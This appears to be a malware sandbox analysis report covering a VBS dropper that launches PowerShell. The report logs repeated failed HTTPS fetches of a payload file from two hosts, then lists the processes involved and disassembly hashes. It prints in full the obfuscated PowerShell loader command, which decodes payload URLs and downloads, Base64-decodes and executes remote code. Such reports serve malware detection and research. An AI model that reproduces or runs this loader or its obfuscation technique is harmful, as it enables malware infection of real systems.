                                                  17192.168.2.449860184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:26 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:26 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:43:26 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:43:26 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.449876148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:32 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:32 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:43:32 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:43:32 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:43:32 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.449887184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:38 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:38 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:43:38 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:43:38 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.449903148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:44 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:44 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:43:44 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:43:44 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:43:44 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.449918184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:49 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:50 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:43:50 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:43:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:04:41:40
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs"
                                                  Imagebase:0x7ff70dbb0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:04:41:40
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:2
                                                  Start time:04:41:40
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:3
                                                  Start time:04:41:43
                                                  Start date:05/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                  Imagebase:0x7ff795ec0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FFD9B836A1B Relevance: .2, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.3007651451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 04adc3ca82a1e0388cb4ed88f6968ad01c01fdd5ed5eddd908b8b286cb4d4ae8
                                                    • Instruction ID: 43a02171b2147e8e7a7b1d0b69c0f620b5e72395cd92ecb7142d20069f56fe65
                                                    • Opcode Fuzzy Hash: 04adc3ca82a1e0388cb4ed88f6968ad01c01fdd5ed5eddd908b8b286cb4d4ae8
                                                    • Instruction Fuzzy Hash: B551B5A2A0F7CA5FD767A7B808755617FE0EF57214B0900EBD0998B1E3E90D690AC352
                                                    Function 00007FFD9B83687D Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.3007651451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a52e5d377373cbddf57120182126c2fa9b6e028d15bfa2cd21119a601ace2c7
                                                    • Instruction ID: cee5f0847083e5c2ece24b701dd445e5c291fd05bcb2049831fc709425dd92de
                                                    • Opcode Fuzzy Hash: 8a52e5d377373cbddf57120182126c2fa9b6e028d15bfa2cd21119a601ace2c7
                                                    • Instruction Fuzzy Hash: 48117572B1E94E4FE799EB5C94619A877E2EF8C214B5900B5E41CC72A6DE25EC418700
                                                    Function 00007FFD9B83940E Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.3007651451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 349410ec1cf8c6b490b6725c305ae2d64abeef86b68e96dc017f9e2e59ceefb2
                                                    • Instruction ID: 1810dce7bce1880bbb1fc6e674d31045c2ad288ec8ba8a9520cdac1d40b767f3
                                                    • Opcode Fuzzy Hash: 349410ec1cf8c6b490b6725c305ae2d64abeef86b68e96dc017f9e2e59ceefb2
                                                    • Instruction Fuzzy Hash: C1110832F0F68D8FEBA5EBA844685A87B91EF59310F1504BEC08DC72A7DA259C44C351
                                                    Function 00007FFD9B763535 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.3007315789.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                    • Instruction ID: 662e280c937e7ea4aa8bdaf3df67460d56bef4c90e85a80d25cee34920001367
                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                    • Instruction Fuzzy Hash: 3C01677121CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC36A6DB36E881CB46

                                                    Non-executed Functions

                                                    Function 00007FFD9B834F34 Relevance: 1.8, Strings: 1, Instructions: 576COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.3007651451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 6ba6c0ab439a867c3237f5922862f2a7d19e607250c3752dfb73303ce5ac0a98
